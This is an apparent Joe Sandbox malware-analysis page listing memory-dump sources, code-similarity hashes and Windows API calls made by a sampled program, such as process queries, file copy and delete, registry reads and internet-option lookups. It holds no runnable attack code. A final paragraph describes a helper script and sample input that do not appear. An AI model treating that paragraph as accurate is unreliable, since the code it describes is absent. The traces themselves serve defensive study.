                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BinaryCryptString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 80407269-0
                                                                                                                                                                                                                          • Opcode ID: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                          • Instruction ID: 62de5bec956a169481a5778194fdf1df57051168b430666ee5781268b5f467f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0B475108605BFD3009F26DC85DAB73ADEB88784B110029F9468B391EBB4BC008B65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1778838933-0
                                                                                                                                                                                                                          • Opcode ID: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                          • Instruction ID: 5146c5ff74eb99c3e513b584e61ba0d8331e3ddd70afdd09c52295fb5902dc9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5E09AB1752321AFE320CF69CC85F233BAEEB89A20B008060BA00C7351D574EC0086A4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                          • Instruction ID: 089dadb44dc18b0797678ef5ba442c8809652ba94fb7cfa67b65c038052ec9a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE012362163549FC614CF18D8D4E16B3A9EF8AA54B1B446CD50257742D620ED10CB64
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                          • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                          Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
• Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
• Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
APIs
• HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0041E204
• lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
• lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
• lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
• lstrcatA.KERNEL32(0067CCAB,0067CCAB), ref: 0041E29F
• HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
• HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E320
• DeleteFileA.KERNEL32(00000000), ref: 0041E33C
Similarity
• API ID: lstrcat$Heap$Free$AllocDeleteFile
• String ID:
• API String ID: 1985952241-0
• Opcode ID: 742f469a22a5af341631ed651aab7db57a0a93ccf1e1eb72d22d5aadee9c9044
• Instruction ID: 24bc4b787eba163100fbfc58756f5204999f887e60b27380e355edf6f9f48f95
• Instruction Fuzzy Hash: 91410579601204AFC704DF68EDD596AB7B8FF986007080065ED05E7371EAB4FE12DB6A
APIs
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
• Opcode ID: 3bf3ba5641bcf99497e469fec77b724b2c10feb8ef39c834a77696430b12b83d
• Instruction ID: 67b5a4a5b04daad7a95f60bd5bee8071c83f245bd0fc84978605f90964d48742
• Instruction Fuzzy Hash: 2FF14BB5A02204DFD208DF2CEDD8E29B7E5FB89304705456CED1597361EEB4E8528B2A
APIs
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436C91
• lstrcpyA.KERNEL32(?,00000000,?,?,0067DAB5), ref: 00436CF2
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
• Opcode ID: 93f08abacc95682a9c454f0aeec93fbafce23c33d6c2ac6c23b768737a7c3e7a
• Instruction ID: 2d8285d9dab4c637f8c7953bcd4f462bcb5e2ae0e6670f6db3990a7f1b9a1ef9
• Instruction Fuzzy Hash: EAC14D75B02208DFD208DF2CEDC8E2977E5FB893047040568ED55D7361EEB4E8568B2A
APIs
Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: lstrcat$memset
• String ID: 0
• API String ID: 2788080104-4000257214
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcat$memset
• String ID: 0
• API String ID: 2788080104-4000257214
APIs
• GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00442CA8
• GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00442CF1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc
• String ID: HttpQueryInfoA$InternetSetOptionA
• API String ID: 190572456-1775429166
APIs
• RegQueryValueExA.ADVAPI32(?,0067D0F7,?,?,?,?), ref: 004313AA
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: QueryValue
• String ID: " $^\w$^\w
• API String ID: 3660427363-1957396040
APIs
• lstrcatA.KERNEL32(?,0067CC40), ref: 0041C8FB
• lstrcatA.KERNEL32(?,0067CC49), ref: 0041C92E
• lstrcatA.KERNEL32(?,0067CC4C), ref: 0041C979
• lstrcatA.KERNEL32(?,0067CC4F), ref: 0041C9C4
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcat
• String ID:
• API String ID: 4038537762-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CopyFile
                                                                                                                                                                                                                          • String ID: 0$ 0
                                                                                                                                                                                                                          • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                          • Opcode ID: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                          • Instruction ID: de3a1f93126c12deb6ed219e4da2e682fdb512e8e31929a1438dbe72cb210f2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EventOpen
                                                                                                                                                                                                                          • String ID: -E~$z0_
                                                                                                                                                                                                                          • API String ID: 3658969616-3497079166
                                                                                                                                                                                                                          • Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                          • Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CopyFile
                                                                                                                                                                                                                          • String ID: 0$ 0
                                                                                                                                                                                                                          • API String ID: 1304948518-2612948726
                                                                                                                                                                                                                          • Opcode ID: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                          • Instruction ID: 46ca0ec3ac5e7fe645135cbb6742112b101b88f065de0e8023397726ea1268d6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df052aac11e301a021650c70e2375969a0f3c96d4bf947737d91edd22a595e1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4018C3AB40100AFD744DF68DD91E4833E69BCA200B1906B9ED05D33A1E5B0AC458B56
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$Network
                                                                                                                                                                                                                          • API String ID: 0-350251746
                                                                                                                                                                                                                          • Opcode ID: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                          • Instruction ID: f80f0783777fa5cc836e735bdae024c9e7f2125abd3eb6355b1fadc9e12c604f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2fb731ace9cead62e1cda8bb610104f77ef50a826361aad85745bc2f7790bb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4E04F7960020ADFC708DF24DEA4994B3BAFFC6248B094564DD099B235E7B1BC46CB55
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
• Instruction ID: c250d11b6629f2eea65e49512af102c608c6350f49251a8cd05842a55814024d
• Opcode Fuzzy Hash: df9b1c11c21afe3b4a5a63d76e1ed78569fe613691e4912eca3732ab10c9d118
• Instruction Fuzzy Hash: 49116DB2D101286BE7109AA5DC49E9B7EBCEB85358F04042EF508D7241E6B59A44CBE4
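The dump names above encode which process, analysis phase, address and page protection each memory region came from. The following is an added helper, not Joe Sandbox code and not part of this report, that decodes those names; the field layout (PID, phase, dump id, base address, protection, three further fields) is an assumption inferred from the names listed here, with PID, phase and image base cross-checked against the snapshot file name "hcaresult_14_2_400000_...", and the last three fields are kept as raw integers because their meaning is not stated on this page. The page-protection values are the standard Windows constants from winnt.h. The sample input is the list of dump names from this section; it shows that the region at 0x401000 (RVA 0x1000, the usual .text location) is mapped PAGE_EXECUTE_WRITECOPY, which is the memory-side view of the "PE file has a writeable .text section" signature.

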